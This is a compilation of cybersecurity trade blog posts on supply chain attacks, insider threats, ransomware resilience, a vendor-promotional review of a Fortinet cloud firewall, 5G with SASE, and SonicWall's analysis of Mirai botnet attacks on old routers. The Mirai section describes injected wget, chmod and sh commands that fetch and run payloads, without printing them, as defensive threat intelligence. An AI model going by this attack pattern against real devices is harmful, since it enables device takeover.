Author: Jane Devry

Cybersecurity threats are multi-faceted, often connected, and accelerating fast. Ransomware, nation-state attacks, employee errors, and third parties – all pose risks for enterprises seeking to safeguard their organizations and customers from cyber attacks and the resulting consequences.

One particularly insidious threat is the supply chain attack. Particularly in today’s interconnected, digital world that favors diverse sourcing, supply chains are increasingly vulnerable to cyber breaches. Even a seemingly small entry point – say, an outdated password on a legacy system – can open the door to massive havoc that can impact and even shut down an entire business.

What is a Supply Chain Attack and How Do They Happen?

A supply chain attack is an orchestrated strike by cybercriminals to find and take advantage of vulnerabilities in the connected network of suppliers, vendors, and contractors that support an organization’s operations – sometimes called the extended enterprise, or the 3rd/nth parties.

Bad actors use a “back door” approach by targeting these downstream suppliers or third parties with the goal of getting to the ultimate organization. Usually, the ultimate target is larger or more desirable and theoretically harder to breach. By using the smaller or less protected supplier, hackers can gain access through malware or other malicious code, such as viruses, ransomware, or other programs designed to steal data or disable systems.

SolarWinds, for example, was hit via a devastating attack on a software supplier impacted numerous organizations, including government agencies. Another would be the attack Log4j was dealt due to a vulnerability in a widely used open-source logging library that exposed many organizations to potential attacks. There are countless other examples over the years, and hackers have only become smarter especially as supplier networks have continued to multiply exponentially due to the many benefits they bring to an organization. 

Vulnerabilities are on the rise, too: up 180% from 2022 to 2023, according to Verizon’s 2024 Data Breach Investigations Report. The same report shows vulnerability exploitation of web applications specifically represented roughly 20% of data breaches, with VPN vector exploitations expected to take up an increasing share by 2025.

Assessing the Impacts of Supply Chain Attacks

A supply chain data breach has obvious immediate implications: compromised data, the potential need to shut down systems, the cost of remediation and recovery, and the likely decline of customer trust. 

Longer-term implications include financial losses, reputational damage, regulatory penalties, and operational disruptions. In industries such as healthcare or critical infrastructure, where safety is paramount, the consequences can even become life-threatening.

Supply chain attacks also have a “ripple effect”: rarely is just one supplier impacted. Think of the chip shortage in 2023. While not the result of a data breach, Tesla was severely impacted in 2023.

Strategies to Stay Ahead of Supply Chain Attacks

To stay ahead of cyber attacks, including supply chain attacks, organizations must carefully manage their cyber and IT risk as part of coordinated risk strategy that includes:

  • Vetting and monitoring of third parties: All third parties, including suppliers, vendors, and contractors, must be assessed when onboarding to understand their security posture and risk management practices. Ongoing monitoring is a must for continued due diligence and alerting to potential security issues. And ensure you have a robust program for offboarding third parties and suppliers. Old credentials provide an easy entry for malicious actors.
  • Enterprise-wide risk assessment: Connect risk data across divisions and globally for a complete view of risk. Use autonomous monitoring to detect potential risks and control failures to prevent malicious entry.
  • Incident preparedness: Tailor incident response plans to identify and monitor the critical suppliers in the supply chain. Ensure coordinated efforts are in place to effectively respond to security incidents. Most critically, protecting against supply chain attacks requires proactive collaboration, coordination and communication. 

Why Short-Term and Long-Term Risk Management Matter

Cyber risk management is essential because cyber threats are accelerating along with vulnerabilities, and organizations can’t afford to be complacent.

Consequences of lackadaisical risk management include immediate impacts of a breach – lost data, downtime, and costs of remediation – as well as longer-term consequences. 

Brand reputation and competitiveness are at stake, as are relationships with other suppliers. Regulatory repercussions are real, especially with the advent of resilience legislation like the EU’s Digital Operational Resilience Act (DORA) and the SEC’s Cybersecurity Rule, both of which come with stringent consequences for not managing and reporting cyber attacks.

Finally, risk leaders can even be held personally accountable for the consequences of attacks. CISOs are the most obvious candidate, but Chief Compliance Officers also may be liable. And even non C-level leaders may not be exempt.

Stay Prepared – And Stay Ahead of Risk

With interconnected risks growing fast and technologies like AI making bad actors even smarter, the stakes in cyber risk have never been higher. Proactive, collaborative cyber risk management can’t completely prevent cyber and supply chain attacks, but it can empower organizations with agility and resilience to lessen their inevitability – and rebound with confidence.

 

The post The Underestimated Cyber Threat: Anticipating and Combatting Supply Chain Attacks appeared first on Cybersecurity Insiders.

Insider threats are a growing concern for organizations of all sizes and industries, and can be both intentional and unintentional, resulting in significant consequences for the organization’s data, finances, and reputation. Organizations face a significant threat from within their own ranks, where a current or former employee, partner, contractor, or vendor can compromise sensitive data, whether intentional or unintentional, and potentially working with others to achieve their goal.

What are Insider Threats?

Insider threats are attacks on an organization’s systems and data by individuals who have authorized access to the network. These threats can be categorized into three types: malicious insiders, who deliberately misuse their access rights; negligent insiders, who inadvertently cause security breaches due to carelessness or lack of awareness; and adversaries with stolen credentials, who use stolen credentials to access an organization’s systems.

Insider threats can take many forms, including malicious activities such as stealing sensitive data, sabotaging systems, or collaborating with external attackers. Negligent insiders may fail to secure sensitive data, make phishing mistakes, or fail to follow security policies. Adversaries with stolen credentials may use stolen credentials to access systems, deploy malware, or steal data.

To detect insider threats, organizations must collect, consolidate, and analyze vast amounts of event data. User behavior analytics (UBA) can help establish baselines of normal user behavior and flag true threats.

The Modern Workplace and Insider Threats

The modern workplace has undergone a significant shift, with the majority of employees now working remotely or in a hybrid environment. As a result, securing company data and applications has become a top priority. Insider threats are particularly concerning, as they can be difficult to detect and resolve, with an average cost of $179,209 to contain the consequences of an insider threat. All organizations are vulnerable to insider threats, regardless of size or industry. Small and medium-sized businesses (SMBs) are particularly at risk due to their limited resources and expertise.

Types of Insider Threats

There are several types of insider threats that organizations must be aware of. These types include:

The disgruntled employee

The disgruntled employee is a threat to the organization who wants to harm the organization by destroying data or disrupting business activity. These employees may be motivated by personal issues, a sense of injustice, or feeling left out of the organization’s decision-making process. They may use their access to sensitive information and systems to cause harm, making it essential for organizations to monitor and address employee dissatisfaction and potential issues.

The malicious insider

The malicious insider is an employee who steals data for personal gain. This can include intellectual property, financial information, or sensitive user data. Insiders may be motivated by financial gain, revenge, or a sense of power and control. It is crucial for organizations to implement robust security measures and monitor employee behavior to prevent or detect insider threats.

The feckless third party

The feckless third party is a business partner who compromises security through negligence, misuse, or malicious access. These partners may be unintentionally exposing their organization to security risks, such as poorly configured networks, inadequate access controls, or weak passwords. Organizations must ensure that their third-party partners are following best practices and adhering to security standards to minimize the risk of a security breach.   

Behavioral Indicators of Insider Threats

Unusual behavior is often a sign of an insider threat, which can manifest in various ways. Suspicious activity, such as account lockouts, multiple failed logon attempts, or attempts to transfer large volumes of data outside the network, can be a red flag. Additionally, behavior that is unusual for a particular individual or group, such as accessing sensitive data or resources outside of normal working hours or from unusual locations, can also indicate a potential insider threat. 

Below are 10 of the most common indicators of insider threats:

1. Financial distress: When employees are struggling financially, they may be more vulnerable to temptation and may compromise company systems for personal gain.

2. Workplace tensions: Conflicts with management or colleagues can lead to disgruntled employees seeking revenge by targeting the company’s systems or data.

3. Unusual access requests: Sudden and excessive requests for access to sensitive information or documents can be a sign of an insider threat.

4. Employment history: Employees who have a history of frequent job changes or significant gaps in their employment history may be more likely to engage in insider threats.

5. Suspicious data transfers: Unusual or excessive exporting of documents and files to personal devices can indicate a potential insider threat.

6. Insufficient device security: Using personal devices for work purposes without proper security measures in place can create a vulnerability to insider threats.

7. Unusual work hours: Suspicious activity outside of regular working hours can be a sign of an insider threat.

8. Isolated behavior: Employees who exhibit unusual behavior when they are alone in the workplace or away from the norm can be indicative of an insider threat.

9. Anomalous network activity: Unusual network traffic or searches can be a red flag for potential insider threats.

10. Excessive file viewing: Frequent and unusual viewing of sensitive files and documents can be a sign of an insider threat.

Mitigating the Risks of Insider Threats

To mitigate the risks of insider threats, organizations must implement several measures. One is to use a User Behavior Analytics (UBA) solution to help manage and secure access to sensitive data, systems, and accounts. Additionally, implementing the Principle of Least Privilege (PoLP) can help prevent insiders from accessing sensitive information they don’t need. It is also essential to manage and secure privileged credentials, monitor and audit privileged access, and educate employees on cybersecurity best practices. Having tools in place to help investigate and recover from insider threats is crucial. Additionally, providing regular cybersecurity training to employees and promoting a culture of cybersecurity awareness can help prevent insider threats from occurring.

NOTE: Insider threat detection and prevention is not just the responsibility of IT cybersecurity teams. Everyone in the organization, including business users, leadership teams, and IT teams, must work together to reduce the risk of insider threats.

Insider threats remain a significant concern for many organizations, as they can be challenging to identify and address without the necessary tools and expertise. It is crucial that companies prioritize securing their most valuable assets, including privileged accounts, systems, and data.

 

The post Insider Threat Detection: What You Need to Know appeared first on Cybersecurity Insiders.

With summer in full swing, most seasonal businesses are well underway. From landscape maintenance to pool care to summer rentals (vacation properties, recreational vehicles, bikes, kayaks, etc.) and more, these small businesses always face immense pressure to perform over just a few months of warm weather in most locations across the country.

Unfortunately, this pressure also makes them an ideal target for ransomware attacks. Hackers want to get paid, and they know that their odds increase when they hit businesses not only where it hurts—their data—but when it hurts—when companies are most vulnerable to the negative effects of downtime. For summer businesses, that’s during their condensed busy season.

And the fact that they’re small businesses doesn’t afford them the obscurity that they might think. While hackers extorting millions from large enterprises may make headlines, small businesses are increasingly in the crosshairs of ransomware gangs. According to recent data, more than half of the ransomware attacks in 2023 by the notorious LockBit group targeted companies with fewer than 200 employees

There’s another harsh reality: three-fourths of these businesses would likely shut down permanently if forced to pay a ransomware demand. The combination of the ransom payment itself and the disruption to business operations would simply be too much for them. 

To counter this, seasonal businesses need to ensure they have the tools in place to quickly recover their business-critical information without having to bend to the will of a hacker. True, small businesses may lack the resources and personnel to implement the same robust cybersecurity defenses larger companies have, but the fact is that small businesses can no longer afford to ignore cyber resilience.

Getting started

The basics of cyber resilience that every small business should have in place are:

  • A backup and recovery tool – This enables swift recovery after an attack. For small businesses, this could involve a combination of on-premises plus cloud backup and recovery services. Backups should follow the 3-2-1 strategy: maintain at least three up-to-date copies of data on at least two different media with at least one offsite.
  • Endpoint protection and threat detection – Seasonal businesses should consider managed detection and response services from a reputable service provider to augment limited in-house security expertise. Also, implementing security information and event management can help improve the visibility of threats. 
  • A detailed and regularly rehearsed incident response plan – This includes documented clear procedures for containing threats, notifying stakeholders and recovering computer systems and data. Conducting regular full rehearsals of ransomware incident scenarios will help to ensure the plan is adequate and up to date. 
  • Strict discipline in patching software – Automated software security patch management across all devices, servers and software is key to fixing known vulnerabilities. Authenticated vulnerability scanning can help discover unpatched computer systems and applications. 
  • Ongoing cybersecurity awareness training – Building a security-aware culture through mandatory security training for all staff is also important. Examples of real-world phishing and social engineering attacks should be included. 

Advanced strategies 

The use of immutable backup solutions is one of the most critical advanced strategies a small business can take to secure its data and computer systems. These backups create copies of data that cannot be altered or deleted, even by privileged users. This prevents attackers from holding the data hostage through encryption during ransomware attacks. By ensuring the ability to quickly restore systems to a known clean state, immutable backups can significantly improve a business’ recovery capabilities.

Another strategy is air-gapping—physically isolating critical systems and backups from the main network. This physical separation stops the spread of threats and prevents attackers from moving laterally across the digital environment. Combined with robust backup and recovery processes, air-gapping is an effective way to protect an organization’s most sensitive data and computer systems. 

Finally, zero-trust security models help by assuming no user or device is inherently trustworthy, requiring continuous verification and authorization. By eliminating implicit trust, businesses can significantly reduce their attack surface and improve their overall security posture.

Beat the heat

The threat of ransomware attacks against seasonal businesses is as real as the heat waves we’re sure to encounter as the summer months roll on. Unfortunately, beating the “heat” from cybercriminals isn’t as simple as drinking plenty of water and enjoying the shade. Instead, small businesses need to implement the tools and strategies outlined here—ideally all within a comprehensive package that makes them easy to implement and manage—to increase their cyber resilience and avoid the potentially devastating results of successful ransomware attacks. 

 

The post Summer Seasonal Businesses Can’t Afford to Ignore Ransomware Resilience appeared first on Cybersecurity Insiders.

The management of day-to-day cloud security operations presents a multifaceted challenge for organizations, requiring a delicate balance between technological, procedural, and human factors. Multi-cloud environments significantly increase the complexity and challenges of managing and securing cloud workloads. To effectively address these challenges, organizations should leverage integrated security solutions that offer visibility and control across multi-cloud environments, supporting consistent data protection and privacy standards. Emphasizing partnerships with vendors that provide comprehensive multi-cloud security capabilities and fostering skills development can empower businesses to overcome the complexity of securing multi-cloud architectures. This approach not only mitigates the identified challenges but also harnesses the full potential of multi-cloud environments for enhanced agility, scalability, and innovation.

What are your biggest challenges securing multi-cloud environments?

Multi-cloud environments significantly increase the complexity and challenges of securing cloud workloads. Ensuring data protection and privacy in each environment is identified as the most significant multi-cloud security challenge, with 55% of respondents highlighting it as a concern.

Source: 2024 Cloud Security Report produced by Cybersecurity Insiders

                 

INTRODUCING THE FORTINET FORTIGATE CLOUD NATIVE FIREWALL (CNF)

FortiGate Cloud-Native Firewall (CNF) is a SaaS delivered Next Generation Firewall (NGFW)  service designed for cloud environments, offering scalable security for outbound traffic from multiple cloud networks without requiring network redesign or infrastructure management. It supports geolocation policies, malware protection, and compliance enforcement. Automatically scaling its network protection on AWS, FortiGate CNF meets the dynamic demands of cloud computing with ease.

“With FortiGate CNF, customers can build confidently, boost agility, and take advantage of everything AWS has to offer. As a fully managed cloud-native service, FortiGate CNF provides enterprise-level firewall services and network security that help reduce risk, improve compliance, and optimize customers’ security investments.” 

Dave Ward, GM, Application Networking, AWS

FortiGate Cloud-Native Firewall (CNF) confronts a broad spectrum of security challenges that plague modern cloud environments, focusing on mitigating threats associated with unsecured outbound traffic.

These challenges include, but are not limited to:

  • Malware: FortiGate CNF provides robust protection against connections to compromised servers, which could lead to unintentional malware downloads. By monitoring and controlling outbound traffic, it prevents malware from infiltrating the network.
  • Data Exfiltration: The solution addresses the critical issue of data exfiltration by blocking compromised systems from communicating out and sending sensitive data to unauthorized systems. This is vital for safeguarding proprietary and personal data against external threats.
  • Command and Control (C2) Communication: It effectively cuts off compromised workloads from communicating with C2 servers. By preventing these communications, FortiGate CNF disrupts the ability of attackers to execute commands or steal data, thus neutralizing the threat.
  • Crypto Mining: By identifying and blocking connections to IPs known for exploiting cloud resources for crypto mining purposes, FortiGate CNF ensures that organizational resources are not siphoned off for malicious gain.
  • Compliance Violations: The solution enforces compliance by preventing unauthorized communications with restricted or prohibited countries, systems, or entities. This feature is particularly crucial for organizations needing to adhere to strict regulatory and compliance guidelines.

KEY CAPABILITIES

FortiGate Cloud-Native Firewall (CNF) offers a suite of key features designed to fortify cloud environments against a wide range of cyber threats, ensuring seamless integration, dynamic scalability, and stringent compliance with regulatory standards.

1. Egress Security: In today’s landscape, where cloud adoption is ubiquitous, securing egress traffic has become paramount. Egress security from FortiGate CNF mitigates risks such as data exfiltration, malware propagation, and botnet activities. It enables organizations to control traffic leaving their cloud environments, ensuring that sensitive data remains protected and that malicious communications are effectively blocked.

2. Known Bad IP Filtering: Leveraging FortiGuard Labs IP Reputation Intelligence, this feature enhances security by preventing access to malicious IPs and Command and Control servers. This proactive measure significantly reduces the risk of security breaches and cyber attacks, ensuring that organizational resources are safeguarded against known threats.

Figure 1 – Known Bad IP Blocking in FortiGate CNF

3. Geo Fencing: Geo Fencing provides the ability to enforce country-level security policies with ease, a crucial capability for organizations needing to comply with regulatory requirements or to implement geographic restrictions on their cloud resources. This feature simplifies the enforcement of geo-specific rules, aiding in compliance and data sovereignty efforts.

Figure 2 – Geo Fencing Example

4. East-West Security: Protecting cloud-based workloads— including dynamic objects like serverless resources, Kubernetes resources, and auto-scaling groups— is essential for maintaining the integrity of internal networks. By enforcing network security policies dynamically, FortiGate CNF ensures comprehensive protection, facilitating secure communication and data transfer within cloud environments.

5. Dynamic Security: The ability to define security policies using intuitive objects (like countries, FQDNs, and AWS resource metadata) empowers organizations to adapt swiftly to changes in their cloud environments. This dynamic security approach reduces the need for constant manual policy updates, enhancing efficiency and responsiveness.

6. Regulatory Compliance: Assisting in meeting various regulatory compliance requirements, such as GDPR, HIPAA, and PCI-DSS, FortiGate CNF helps organizations protect sensitive data and maintain privacy standards. This capability is invaluable for businesses in highly regulated industries, providing a foundation for compliance and data protection strategies.

7. FortiGuard Labs Services: Integration with FortiGuard Labs ensures that FortiGate CNF benefits from up-to-date security intelligence, including multiple security signatures and IP reputation information. This integration enhances the overall security efficacy, offering proactive protection against emerging and existing threats.

8. AWS Firewall Manager Integration: The automation of VPC attachment and policy rollouts through AWS Firewall Manager underscores FortiGate CNF’s commitment to seamless integration and ease of use within the AWS ecosystem. This feature streamlines security management, allowing for more efficient and centralized control over cloud security policies.

Figure 3 – AWS Firewall Manager Integration

9. Advanced Network Security: By offering the latest in network security functionalities, such as IPS, AV, and SSL inspection, managed through FortiManager, FortiGate CNF ensures that organizations can maintain a high level of security without compromising on performance. This comprehensive coverage is essential for defending against sophisticated cyber threats.

10. FortiManager and FortiAnalyzer Integration: The seamless integration with FortiManager and FortiAnalyzer provides advanced management and analytics capabilities. This cohesive integration allows for the centralized management of security policies and insightful analytics, enhancing operational efficiency and security visibility across the network.

Figure 4 – Configuring FortiGate CNF to Send Logs to FortiAnalyzer

“We have been using FortiGate Cloud-Native Firewall for a few years now. It is the most stable and recommended firewall. Users with less technical knowledge can easily manage complex network and security components using it.” -Senior System Administrator

KEY BENEFITS

FortiGate Cloud-Native Firewall (CNF) stands out as a comprehensive solution for securing cloud environments, combining advanced technology and user-centric features to deliver unparalleled security. Here’s an overview of the key benefits that underscore its unique position in the market:

1. Market-Leading Security: FortiGate CNF is powered by Fortinet’s cutting-edge Next Generation Firewall (NGFW) technology, including intrusion prevention systems (IPS) and advanced threat intelligence from FortiGuard. This robust security framework ensures real-time protection against emerging and sophisticated threats.

2. Frictionless Deployment: Designed with cloud first principles, FortiGate CNF offers a seamless deployment experience, optimizing protection for cloud networks. Its cloud-native architecture ensures that it integrates effortlessly with existing cloud infrastructures, making it an ideal solution for modern digital enterprises.

Figure 5 – The Easy-To-Use Deployment Wizard in FortiGate CNF

3. Cost-Effective Security: With its pay-for-use security model, FortiGate CNF allows organizations to only pay for the traffic that is secured across their cloud accounts, networks, and workloads. This flexible pricing ensures that businesses can maintain robust security without incurring unnecessary costs.

4. Simplified Security Management: The intuitive dashboard and predefined policies of FortiGate CNF streamline the security setup process. Customers can easily specify their security policies and network preferences, while FortiGate CNF handles the complex aspects of security management, offering a hands-off approach to network protection.

5. Consolidated Security Architecture: A single FortiGate CNF instance can protect multiple AWS accounts, networks, VPCs, and availability zones within a region. This capability provides significant economic advantages by reducing the need for multiple security solutions and simplifying the security architecture.

6. Dynamic Security Policies: FortiGate CNF’s dynamic security policies offer consistent protection that adapts to changes in cloud workloads. This eliminates the need for manual updates to security policies when IP addresses or workloads change, ensuring continuous and effective security coverage.

7. Flexible Management Options: With integration options for FortiManager and AWS Firewall Manager, FortiGate CNF provides unified control over security policies across cloud and hybrid environments. This flexibility allows for consistent security management, regardless of the deployment model or environment.

QUICK DEPLOYMENT AND FLEXIBLE PRICING OF FORTIGATE CNF

FortiGate CNF is a cloud-delivered SaaS solution that can be deployed rapidly, often within 15 minutes, offering a swift enhancement to security postures with minimal downtime. It utilizes a flexible, pay-as-you-go pricing model, billed monthly based on actual consumption, ensuring cost efficiency and scalability for organizations. This approach, combined with the option for procurement through private offers or partnerships, makes FortiGate CNF a highly accessible and adaptable security solution for modern cloud environments.

OUR VERDICT

In conclusion, FortiGate CNF is set to revolutionize how organizations approach cloud security. By streamlining security operations through the automation of infrastructure management and the deployment of predefined policies, it significantly reduces the time to protection, enabling security teams to concentrate on higher level strategic initiatives. Furthermore, FortiGate CNF’s comprehensive coverage across outbound, east-west, and inbound traffic fortifies customers’ security posture, ensuring thorough protection against a broad spectrum of threats. 

The blend of enhanced security, operational efficiency, and cost-effectiveness positions FortiGate CNF as a cornerstone of modern cloud security frameworks, underscoring its value for businesses aiming to navigate the complexities of today’s digital landscape safely.

ABOUT FORTINET

Fortinet (NASDAQ: FTNT) is a driving force in the evolution of cybersecurity and the convergence of networking and security.

Our mission is to secure people, devices, and data everywhere, and today we deliver cybersecurity everywhere you need it with the largest integrated portfolio of over 50 enterprise grade products.

Well over half a million customers trust Fortinet’s solutions, which are among the most deployed, most patented, and most validated in the industry.

FOR MORE INFORMATION: aws.fortigatecnf.com

The post FORTIGATE CLOUD NATIVE FIREWALL (FORTIGATE CNF) appeared first on Cybersecurity Insiders.

Because wide area network (WAN) connectivity has been predominantly wired broadband, cellular connectivity has often been relegated to a failover connection option. Now, organizations recognize 5G for its agility in supporting networks because it takes reliable connectivity past fixed sites and expands it to vehicle fleets, IoT devices and remote workers in places where wired broadband wouldn’t work or can’t be obtained. According to Cradlepoint’s 2024 Global State of Connectivity Report, executives believe 5G will be a key enabler for IoT, supply chain optimizations, AI/ML, and even sustainability initiatives. 

However, the broader definition of WAN brings up some very important concerns. With more and more devices on the edge of the network, how does an enterprise protect this larger attack surface they are laying in front of bad actors?  Enter Secure Access Service Edge (SASE), a cybersecurity model that is finally becoming mainstream. SASE, a cloud-based architecture, is designed to secure today’s corporate networks as they demand simplicity, flexibility, low latency, and security at the WAN edge. This network security model proves to be more critical in protecting enterprises with expanded attack surfaces and distributed workforces. This includes workforces that have remote and mobile users with BYODs, as well as third-party contractors with unmanaged devices who need network access.

The key to truly untethering your WAN lies in bringing these two technologies – 5G and SASE – together to create a complete reimagination of your WAN architecture. 

Understanding the differences between 5G and wired broadband

The flexibility 5G WAN provides is enticing but, before leveraging this technology, businesses must understand how it is different from wired broadband and why combining it with SASE for an agile, secure network makes sense. 

First, 5G allows a mobile component for your network. This creates mobile WAN connectivity for every organization from small businesses with delivery trucks to a public safety organization with a fleet of emergency vehicles. 5G also means a variability in bandwidth. If you leverage a wired network, a 1 gigabyte link remains a 1 gigabyte link. However, 5G bandwidth fluctuates depending on signal strength and signal quality from the connected cell tower. 

Metered links can also be an important consideration. While it’s true in certain countries, unlimited data plans are starting to emerge, most organizations still need to track data plan usage across WAN connections.  

Then there are quality of service QoS) considerations. An IP network uses Differentiate Services Code Points (DSCP), which is a 6-bit field in the IP header that enables the identification of up to 64 distinct traffic classes to help define and create a class schema. Networking devices, such as routers and switches use the DSCP code to assign a numerical value to determine the handling and queue placement of each packet. Similarly, 5G networks have a 5QoS Identifier (5QI) value, which is a pointer to a set of QoS characteristics such as priority level, packet delay or packet error rate to support QoS across a connection to enable class of service differentiation. 

The possibilities become even more intriguing as carriers complete their roll-outs of 5G standalone (SA) networks, where enterprises can take advantage of true differentiated services through network slicing. Carriers will be able to provide “slices” of their 5G spectrum networks to offer specialized technical requirements such as low latency and higher bandwidth. Organizations will be able to subscribe to those services (or slices) based on specific application or organizational needs.

Lastly, when your WAN connectivity is delivered through cellular, there are no physical links to help you understand all the connections and dependencies in your network. This can make troubleshooting more complicated if the proper visibility tools are not in place.

Combining 5G and SASE

These considerations require a custom SASE architecture that can secure your network as you look to 5G to deliver a more agile WAN. However, you’ll want a SASE solution and approach that doesn’t limit what 5G can offer. Your 5G network and SASE solution should complement each other. 

For example, traffic steering is an important component of an agile WAN solution. It helps you prioritize certain data and makes sure there are no interruptions as data travels. When you’re leveraging 5G WAN traffic steering, the focus shouldn’t only be on latency, loss, or jitter — the solution should also steer traffic based on cellular attributes such as available bandwidth and data plan usage. 

Considering bandwidth and data plan usage as you measure WAN performance is also important. Inserting synthetic traffic into your network, thereby using more bandwidth and data, could be costly and inefficient. Instead, a smart SASE approach will measure WAN performance metrics using inline traffic. 

Efficiently securing your 5G WAN

In addition to network optimization, there’s also the “Secure” part of SASE. A SASE approach that complements 5G WAN, will not only secure your network but do it efficiently. There are times when implementing network security features will take up bandwidth and hamper network performance.

For example, IPsec tunneling is often used to secure data as it moves through your network. In certain instances, network security or IT personnel will leverage a solution that encrypts the tunnel to secure traffic from an application that is already encrypted. This “double encryption” negatively impacts bandwidth and can slow down the very application someone on the network is trying to use. Alternatively, micro tunneling, as a part of your 5G and SASE architecture, creates a network security approach that protects data in transport without hampering performance and bandwidth utilization. 

While micro tunneling helps secure data transport, SIM authentication will play a starring role in securing endpoints in 5G WAN. For IoT devices, laptops, and mobile devices, SIM authentication provides a secure but simple way to provide an identity source that can be used to create a security policy for.  This would allow for a clientless security solution across both unmanaged and managed devices.

SIM authentication will also be important as your organization’s devices move from public to private 5G networks. No matter where those devices connect, the SIM card helps maintain the security policy on each device. For example, if a certain device is not authorized to upload files to your network, then that device won’t be able to upload files regardless of which 5G network provides the connection.

Finally, the combination of 5G and SASE requires a comprehensive network management solution. Since visibility and analysis of a cellular network can be difficult, it will help if you can leverage a network management solution that brings in valuable cellular health metrics to make remediation less complex. 

5G and SASE: Preparation for the future

For any business or organization, it’s always important to combine the latest technology with the best security features. 5G WAN is no different. 5G and SASE help you take your network to new places, while making sure your network is always safe. It’s like having a bodyguard for your mobile devices and data even as they move past the confines of an office space or headquarters. 

And let’s not forget about the 5G network capabilities to come. As 5G standalone networks give way to more mainstream network slicing, a comprehensive network approach that combines 5G and SASE approach will provide efficiency and security for the networks of today — while setting the foundation for networks of the future.  

 

The post 5G and SASE: Reimagining WAN Infrastructure appeared first on Cybersecurity Insiders.

Already in 2024, we successfully defended against 5.8 million Mirai-related attacks and saw a spike in honeypot activity related to Mirai, all aimed at exploiting vulnerabilities in aging router systems. These attacks exhibit striking similarities, a theme we will explore further in subsequent sections of this blog. By understanding the common threads among these exploits, we can better fortify our defenses against future incursions and safeguard our network infrastructure from potential compromise. To facilitate this understanding, we are committed to continually releasing threat intelligence to ensure the industry has the most complete and updated information related to attacks on small- and medium-sized businesses (SMBs). Our research team has created five signatures across our product portfolio to ensure our customers are protected from this increasing threat.

Mirai is a significant malware threat known for targeting Internet of Things (IoT) devices, such as routers and IP cameras, to form extensive botnets. Emerging in 2016, Mirai exploits weak default credentials and vulnerabilities to compromise devices, granting attackers remote access. These compromised devices are then utilized to orchestrate large-scale Distributed Denial of Service (DDoS) attacks, posing a substantial threat to internet infrastructure worldwide. 

Tracing the Path of Mirai’s Evolution

Mirai, created by Paras Jha, Josiah White and Dalton Norman, was crafted to exploit IoT device vulnerabilities for botnet recruitment. Initially, it was detected in August 2016 by MalwareMustDie researchers during a large DDoS attack on Brian Krebs’ cybersecurity site. Mirai’s source code was subsequently released by its creators in September. This release spawned numerous malware iterations, intensifying IoT security concerns. One of the most memorable breaches included the unprecedented 620 Gbps DDoS attack on KrebsOnSecurity and the October 2016 Dyn cyberattack, paralyzing internet services for major platforms like Twitter and Netflix. In 2024, we have already prevented 13.6 million attacks against IoT devices which is a 29% increase from 2023.

Mirai operates through a systematic sequence of steps: scanning for vulnerable IoT devices, exploiting weaknesses like default credentials to gain entry, infecting them to form a botnet and launching potent DDoS attacks. It spreads by continuously seeking new targets and adapts dynamically to evade detection and mitigation efforts as explained in Figure 1.

Figure 1: Mirai attack chain

Honeypot Insights

SonicWall’s honeypots found Mirai leveraging exploits targeting old vulnerabilities in routers like Zyxel, Netgear, D-Link and TP-Link to spread Mirai. Let us examine some of the honeypot findings through the similarities in attack patterns.

1. Injection of Commands: Each attack attempts to inject and execute commands on the targeted device. These commands are typically aimed at downloading additional malicious payloads, granting unauthorized access or somehow compromising the device. For example, from a packet captured from our honeypots in Figure 1, wget, chmod and rm commands are injected.

Figure 2: Zyxel USG FLEX 100W Command Injection (CVE-2022-30525)

2. HTTP/HTTPS Requests: All attacks involve HTTP requests to interact with the device’s web interface or execute commands remotely. They manipulate URLs or parameters to exploit vulnerabilities in the target devices. For example, from a packet captured from our honeypots in Figure 2 http request is made to device’s GetDeviceSettings endpoint to execute wget , chmod commands

Figure 3: D-Link Devices HNAP SOAPAction-Header Command Execution CVE-2015-2051

3. Downloading and Executing Scripts: Many attacks found in our honeypots involve downloading additional scripts or binaries onto the device from a remote server and then executing the downloaded package. These scripts often contain malicious payloads aimed at compromising the device’s security or establishing unauthorized access. All of the downloaded scripts we reviewed continue to spread Mirai. For example,  from a packet captured from our honeypots in Figure 3, the Mozi.m script is downloaded and executed.

Figure 4: NETGEAR DGN Devices Remote Command Execution

4. Operating System Commands: The commands being executed by Mirai are typically shell commands or scripts intended to manipulate the device’s operating system. They often involve commands like wget, chmod, rm and sh to download, modify permissions and execute scripts from a packet captured from our honeypots as you see in Figure 4. 

Figure 5: TP-Link Archer AX21 Command Injection CVE-2023-1389

Who Has the Biggest Risk?

Figure 6: Mirai Hits by Industry

Not all industries are affected the same for every attack vector. By digging into the data provided by our over 1 million sensors worldwide, we can determine which industries are most impacted by the Mirai botnet, as you can see in Figure 6. Real estate and rental businesses appear to be affected the most by Mirai attacks, with the data showing 86.09% of attacks focused on compromising property management systems. The finance and insurance sectors are also taking on a substantial number of attacks with around 9.65% of attacks focused on the financial sector looking to potentially expose sensitive financial data and cause disruptions to online banking services. The wholesale trade (1.88%) and professional, scientific and technical services (1.49%) sectors aren’t immune either, as they can experience supply chain disruptions and compromised networks.

Identification and Mitigation

The recent data seen by both our firewalls and honeypots underscores the urgent need to secure IoT devices to prevent their exploitation for malicious purposes. While each of the mentioned vulnerabilities affects different router products from various manufacturers, there are some common factors that contribute to their susceptibility to exploitation by malware like Mirai. Understanding these factors can assist in preventing and detecting these types of attacks.

1. Firmware Issues: Many of these vulnerabilities stem from weaknesses in the firmware of the routers. Firmware vulnerabilities can arise due to poor coding practices, insufficient testing or failure to address reported security issues promptly.

2. Insecure Web Interfaces: Several vulnerabilities involve the routers’ web interfaces, which allow users to configure settings and manage the device. Weaknesses in authentication mechanisms or improper input validation can lead to remote code execution or command injection.

3. Shell Metacharacters: Exploitation often involves the use of shell metacharacters in user-supplied input fields. These metacharacters allow attackers to manipulate command execution, enabling them to execute arbitrary commands on the router.

4. Delayed or Lack of Patching: In many cases, vulnerabilities exploited by Mirai and similar malware have been previously disclosed, but routers remain unpatched due to delayed or absent firmware updates. This leaves devices vulnerable to exploitation even after fixes are available.

Default Configurations: Default configurations, including default usernames and passwords, are often targeted by attackers. If users fail to change these default credentials, attackers can easily gain unauthorized access to the router.

To ensure customers are prepared for any exploitation that may occur due to these vulnerabilities, the following signatures have been released which can detect and prevent these types of attacks:

  • IPS 18387 D-Link DIR-645 HNAP SOAPAction Header Command Injection
  • IPS 15761 Zyxel USG FLEX 100W Command Injection
  • IPS 13034 NETGEAR DGN Devices Remote Command Execution
  • IPS 15864 TP-Link Archer AX21 Command Injection
  • GAV Mirai

